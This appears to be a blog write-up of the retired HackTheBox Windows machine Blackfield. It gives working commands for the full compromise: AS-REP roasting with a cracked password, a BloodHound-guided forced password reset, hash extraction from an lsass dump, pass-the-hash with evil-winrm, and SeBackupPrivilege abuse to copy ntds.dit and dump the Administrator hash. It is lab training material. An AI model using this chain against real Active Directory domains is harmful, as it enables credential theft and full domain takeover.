Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
Hackthebox - Blackfield
|htbmachinesretired|0 Comments

Summary

Blackfield,a Windows box created by HackTheBox user aas, It begin with finding list of folders which were username and kerbrosting the box to get a creds using which we can run bloodhound and we see that we can force change password for another uesr. by that we get access to forensic share downloading that we get lass.dmp which contain NTLM hashes and one of them worked for svc_backup account. with that we get on the box. checking groups we see we are member of SeBackupPrivilege using that we upload SeBackupPrivilegeUtils and take ntds.dit and download that and secretdump to get Administrator hash.

Initial Enumeration

nmap

markdown
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
# Nmap 7.80 scan initiated Sat Sep 12 13:44:29 2020 as: nmap -vv -sC -sV -Pn -oN nmap/blackfield 10.10.10.192
Nmap scan report for 10.10.10.192
Host is up, received user-set (0.074s latency).
Scanned at 2020-09-12 13:44:29 IST for 191s
Not shown: 993 filtered ports
Reason: 993 no-responses
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain?       syn-ack ttl 127
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2020-09-12 15:14:43Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=9/12%Time=5F5C8377%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m00s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 48702/tcp): CLEAN (Timeout)
|   Check 2 (port 40786/tcp): CLEAN (Timeout)
|   Check 3 (port 53840/udp): CLEAN (Timeout)
|   Check 4 (port 53637/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2020-09-12T15:17:03
|_  start_date: N/A

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 12 13:47:40 2020 -- 1 IP address (1 host up) scanned in 191.78 seconds

We see 445 open so lets check smb

SMB

shell
1
2
3
4
5
6
7
8
9
10
11
smbclient -N -L \\\\10.10.10.192

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        forensic        Disk      Forensic / Audit share.
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        profiles$       Disk
        SYSVOL          Disk      Logon server share

Checking SMB we see we have many share availiable

we see we can access profiles$ share so i got everything from that share but we only see Folders which seems like usernames.

So lets create a userlist from that.

RPC

We also see rpc open so lets look for anything from that using enum4linux which give us only ACCESS DENIED.

Not seeing any other thing. Lets try kerberoasting as we have usernames?

KerbRoasting

Looking at the nmap result we know the domain name as BLACKFIELD.local0

shell
1
python GetNPUsers.py BLACKFIELD.local/ -usersfile users.lst -dc-ip 10.10.10.192 -no-pass -outputfile kerbrost.out

which found a kerbroastable user as support and get us one hash to crack

llvm
1
$krb5asrep$23$support@BLACKFIELD.LOCAL:6deb3b0f07267682cdbf82b9d72c14f0$74e4f73aba48624ba48e6e49cafd48b71abd7dbb92628b94b25b89b7fe2f251efc5260e2c195e54129f7cb9c82461f5d624ef25b5e6cec35da6eead72ff01ee861e85e95646728fbcacf76064f197f4f8f476a50e577e86fd107277fbb7087ec636cf1fc9132e71b62a6cf17aa771b0714b6b986073e2306a641d43e7722e4293a9df9e76cbef7af12216a5f59cca741c646afdfc6f6ba0fa7bac20958040dbf6bda075fed0342d95e6ff099ba677b91ae616d39ff0c684c1ca7db45ca8a44f0d5c8cb9077a2a2c2508d19b6a93d685aaa6640c9b1bf3f7e07b5644580770f460357684643bf7e9795a8dc2e148f0bf8629f9908

And we can crack this hash using hashcat as #00^BlackKnight

RPC again

Looking at smb we don’t see anything new with support user so i looked back at rpc

Bloodhound

I used bloodhound-python to dump

shell
1
bloodhound-python -u support -p '#00^BlackKnight' --collectionmethod All -d blackfield.local -dc blackfield.local -gc blackfield.local -ns 10.10.10.192

and checking in bloodhound we see that support have ForceChangePassword on audit2020

Checking ForceChangePassword info we see

so using RPC we can change password for audit2020 using

shell
1
rpcclient > setuserinfo2 audit2020 23 'P@ssw0rd'

Changing the password and smbclient to forensic we can dump the forensic share

Checking the dump we find lsass.zip so i used pypykatz to look at the dmp

shell
1
2
$ unzip lsass.zip
$ pypykatz lsa minidump lsass.DMP

which give us the NT hash for svc_backup hash

Shell (SVC_BACKUP)

using the hash and winrm we can get a shell as svc_backups

apache
1
evil-winrm -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d -i 10.10.10.192

Privilege Escalation

Checking whoami /all we see we are member of

abnf
1
2
3
4
5
6
7
8
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

the most interesting for me was SeBackupPrivilege as i can use this to copy files whose access i might not have.

The goal for me was to use diskshadow to create a shadow of C drive and use SeBackupPrivilegeUtils and SeBackupPrivilegeCmdLets to Copy-FileSeBackupPrivilege NTDS.dit and save system.hiv and use secretdump.py to extract hashes.

Create a diskshadow

text
1
2
3
4
set context persistent nowriters #
add volume c: alias someAlias #
create #
expose %someAlias% x: #

and save diskshadow.txt

bash
1
diskshadow /s diskshadow.txt

and upload SeBackupPrivilegeUtils and SeBackupPrivilegeCmdLets module and

powershell
1
2
3
4
Import-module ./SeBackupPrivilegeUtils
Import-module ./SeBackupPrivilegeCmdLets
Copy-FileSeBackupPrivilege X:\windows\ntds\ntds.div C:\temp\ntds.div
reg.exe save hklm\system C:\temp\system.hiv

and using secretdump.py

shell
1
secretsdump.py -ntds ./loot/ntds.dit -system ./loot/system.hiv local | tee hashes.txt

which gave the Administrator hash as 184fb5e5178480be64824d4cd53b99ee using which we can winrm on the box as Administrator

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/blackfield/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
writeupretiredhacktheboxhardwindowsbloodhoundkerbrosting